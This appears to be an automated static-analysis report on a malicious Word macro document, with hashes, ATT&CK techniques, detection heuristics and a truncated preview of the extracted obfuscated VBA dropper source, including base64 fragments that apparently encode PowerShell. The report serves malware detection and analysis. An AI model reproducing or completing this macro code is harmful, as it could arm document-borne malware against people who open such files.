Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 12c221d748d799e5…

MALICIOUS

Office (OLE)

Size: 91.0 KB
Created: 2017-10-27 06:25:00
Authoring application: Microsoft Office Word
First seen: 2017-11-13
MD5: 743f30e15f16394f1c7c972c7aefef4a
SHA-1: c27262a757ba18987ea43f56d738ad5dd3e078fc
SHA-256: 12c221d748d799e5f6161f83151a2f9f4fb7a889ca7452a5027d20d5fe5d4436
Risk Score: 244

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function, a critical indicator of malicious activity, suggesting it's designed to execute arbitrary commands. The presence of obfuscated code and a ClamAV detection for macro obfuscation further supports its malicious nature. The primary intent appears to be downloading and executing a secondary payload.

Heuristics (8)

  • ClamAV: Doc.Macro.Obfuscation-6355576-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Macro.Obfuscation-6355576-0
  • VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 52362 bytes
SHA-256: ef1d3632bd0c683f0ce654c55f75cc7f6ecaf1ca7870f97a6644ce86a03e0ab3
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 84 long base64-like blob(s).
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"

Function tGnGJwjzK()
XZYIZLVNKR = "UD9BJHVPWD2DMUVRDI22ZUDPLQSNadzkIwhNFpUsOUZ0D"
ulShEnnU = Mid(XZYIZLVNKR, 27, 14)
QzdoozpJw = ulShEnnU
OiqBp = "M5LQYLLT3DloEpUsVfWbjtESaGHjHGwniplMWspNRhWpodGXCmFjMdoEQtHQZtUiGzGOEIVcqJJzWPizAjhVAMbEAjvdlZnYMniqWrStQdtCTphAPJPqMwhuVCNXMsrQWkmjhnbJQnFXTYkLwuObJwMOFoUUdujXlcjiCwTbiGFLUSPDO8"
YwkTaWLO = Mid(OiqBp, 10, 161)
mAzmrZjotkc = YwkTaWLO
TnwES = "3QFP4T5VXCIEI6tWUHKiUZIbbDRLYiFPsYqrWEBkCifvDCAsV8JKV4OGA5V5O5QS962"
iTwfu = Mid(TnwES, 15, 34)
nOtKZWm = iTwfu
NojXt = "W5S17YTKWKD74N1RFE6JlzmBAvdXiGjtZlZGWHzaKCSDaoBiOXOHbOYCbvsQVpEwrsRUGmhLWmKihiaMuuILsZRKMXibOiEVzVMiXhcbpNEQRV"
LIEiwZJU = Mid(NojXt, 21, 85)
iHbCflWt = LIEiwZJU
wVqvENS = "6DQ777DMOnFRdWhnjqLRqzZwFWmFYfKddMIdlZlppiLiPikjuzFBwdAVvSraIzoidboRNECGEVcIoujXmGLYaJizLniShLhrtcBnuSSpzwwdBsjAjUoCmQITzoFaWjZtolOMtvdTnWbcMBwTGhjNWfEdThqFMsTNZDoPiUGorVOQojGwqmTozLWJjksMEXGvCNCJMiomauWBQopnatOZYiNNjfitbujTOEYIGNRDAXGK047BKOYL90"
SbEpTWGz = Mid(wVqvENS, 7, 219)
joRlGr = SbEpTWGz
dHTJsbujXM = "MIW2MLU2KLG6E4KzpchzvKjLCnzaOKdJGbqQIYLmqwWIZKhvpboUCIDXhumhuRjuIACFjHqQRvJwnXmsGCD0ZV76RRVZJBNGA"
LPZVwjiZu = Mid(dHTJsbujXM, 16, 67)
ZzzfCLMuGYn = LPZVwjiZu
dpQhlQn = "EWIHJC1svFlKJjXY3530TZQICKKRP0AW"
owWwwvUJzZd = Mid(dpQhlQn, 8, 9)
GbwGPztn = owWwwvUJzZd
UlwJjlztG = "NARX31TUQWXUFD51WYH01RrJYvlTwbEwFvKFHjNsjYKktTTrkWQlDrTkuVXYYQzVGSizDirQDJLbwGPFctjaLTvOcZLlIpUPZodaoToFfzhtjronFSwihZJnXQWdTFIOpvCHcoQIFdvLlBhkkXfptphAfqCYzKmZrTEkphKRCnYDdzCWilsvZSUzOCbmlrKvrVURwwvDOHXE28F4BXYKI"
tYQCbW = Mid(UlwJjlztG, 23, 177)
oKYlPH = tYQCbW
zEiPSojrLJE = "GOXC8NGRMO2M448Z1XBYO3tFncCEHJbOboIiQsttAkSFmKXwQCPDOdBrSCHNOtvBaFMSsIWtwbSamoScEDoEuXAwmRLNljiGpRihwEFIjVHmKbEikiILFqGDFOjbwIIQwMlVJliAwjYYQNnLMhdGXTBwKbcjXdLYNrqwpjUzzIMZShmsaVPOfBsdKmKiIucUUALZXpVcNiGPGcjdojJCOzsLwMnDYmqFjsESVNVPZE0TX"
NAZvCj = Mid(zEiPSojrLJE, 23, 209)
fwAISjFsS = NAZvCj
CJAaLnjC = "OHZYtKazRBZRiPHZYYdtSGfVGhlrsCJAbmtDXoVvNXDcVO9ELYHDAS34C00R"
wMfMvQfFDQr = Mid(CJAaLnjC, 3, 44)
hCtzX = wMfMvQfFDQr
YwYfETuUsV = "K39726ESGBlnWIHwYTjOlirZRbAYIcPhkXDHzGjJHubsftYAtEjNYcimDkiMXNkdmECwFzwRjZGrDztXDAiDvCJIsQEPbXmuJzFbrZutFOdwVnjEqHIXjjikvuGovjqMnMhFtSjdFkwjYKnEjzYUOOLdOUfwSGwVYRLIFdKYafSwhCMlGBHvKVzYBErYmjKwmdIGwizDoAujwNvMIupRwCLCTnHBmmlqUTLE0LOATH"
HHcnbwp = Mid(YwYfETuUsV, 11, 218)
mihiFIU = HHcnbwp
End Function
Function nPWlrffCd()
DFVojjckj = "BGDX6W8AbQBlAFsAMgAxAF0AKwAkAFAAUwBIAE8ATQBlAFsAMwA0AF0AKwAnAHgAJwAp65DJ9Y8K06G60TMLXD225V"
KCEjttz = Mid(DFVojjckj, 7, 62)
AphGMEJqwvi = KCEjttz
LvYwwtRiq = "WCFEOJ8LADUAOgA2ADcAQwAxADEAMQBqADEAMAA5AHsANwA5AHYAOQA4AH4AMQAwADYAUwAxADAAMQB5ADkAOQB4ADEAMQA2AHgAMwAyAHgAOAA3AHgAOAAzAHgAOQA5AH4AMQAxADQAaAAxADAANQB7ADEAMQAyAGoAMQAxADYAOgA0ADYAdgA4ADMAaAAxADAANABDADEAMAAxAHYAMQAwADgAeAAxADAAOABDADUAOQB+ADMANgBqADEAMQA5AHgAMQAwADEAfgA5ADgAaAA5ADkAQwAxADAA4W605RG4J9J"
jGTwVKqiX = Mid(LvYwwtRiq, 9, 284)
wkwAK = jGTwVKqiX
LaflDl = "BUGQR1N9BKTYB5ADQANwBTADQANAA6ADEAMAA0AEMAMQAxADYAagAxADEANgB2ADEAMQAyAFMANQA4AHsANAA3ADoANAAOMUKQ33Z"
wYobKtrQ = Mid(LaflDl, 14, 80)
ujnnbrbWvZi = wYobKtrQ
FXNkirjT = "CZCYKXJYVAxADYAeQAxADEANAB7ADEAMgAxAEMAMQAyADMAdgAzADYAaAAxADEAOQBqADEAMAAxAHYAOQA4AH4AOQA5AGoAMQAwADgAdgAxADAANQB5ADEAMAAxAEMAMQAxADAAfgAxADEANgBqADQANgA6ADYAOABoADEAMQAxAHgAMQAxADkAfgAxADEAMAB7ADEAMAA4AGgAMQAxADEAOgA5ADcAaAAxADAAMAB5ADcAMAB2ADEAMAA1AHgAMQAwADgAewAx6L2A2FPIP"
IqdGMWjvZHj = Mid(FXNkirjT, 10, 258)
QpuKrE = IqdGMWjvZHj
nmBWwSLm = "RHYX28R76X8YXLSFTHC1QU8AG2AOQA3AHgAMQAxADAAeQAxADAAMAB2ADEAMQAxAGoAMQAwADkAOgA0ADYAewAxADEAMABqADEAMAAxAGoAMQAyADAAOgAxADEANgBqADQAMAA6ADQAOQBqADQANAB7ADMAMgBoADUANABoADUAMwBDADUAMwB4ADUAMQB4ADUANABoADQAMQB2ADUAOQB2ADMANgB7ADEAMQAyAFMAOQA3AEMAMQAxADYAQwAxADAANAB2ADMAMgB5ADYAMQBoADMAMgBqADMANgB2ADEAMAAxAEMAMQAxVHI"
DQCmB = Mid(nmBWwSLm, 27, 285)
CFQpjSDhIjU = DQ
... (truncated)